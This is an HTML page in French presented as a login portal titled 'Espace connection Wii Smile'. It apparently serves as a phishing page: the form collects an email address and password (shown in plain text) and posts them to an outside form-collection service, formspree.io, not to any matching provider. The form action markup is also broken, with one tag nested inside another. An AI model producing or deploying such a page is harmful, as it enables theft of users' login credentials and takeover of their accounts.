<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width,initial-scale=1" />
  <title>Espace connection Wii Smile</title>
  <style>
    body { font-family: Arial, sans-serif; background: #f5f5f5; padding: 40px; }
    form { max-width: 400px; margin: auto; background: white; padding: 20px; border-radius: 8px; }
    label { display:block; margin-top:12px; }
    input, button { width:100%; padding:10px; margin-top:6px; }
    button { background:#0066cc; color:white; border:none; cursor:pointer; }
    button:hover { background:#004999; }
  </style>
</head>
<body>
  <style>
  body {
    margin: 0;
    padding: 0;
    background-image: url("fond.jpg.png");
    background-size: cover;
    background-position: center;
    background-repeat: no-repeat;
    height: 100vh;
  }
</style>

  <h2>Connectez-vous</h2>
  <form action="<form action="https://formspree.io/f/xpwypojw" method="POST">
    <label for="Adresse mail">Adresse mail :</label>
    <input type="text" id="Email" name="Email" required placeholder="Votre adresse mail" />

    <label for="Mot de passe">Mot de passe :</label>
    <input type="text" id="Mot de passe" name="Mot de passe" required placeholder="Votre Mot de passe" />

    <button type="submit">Envoyer</button>
  </form>
</body>
</html>
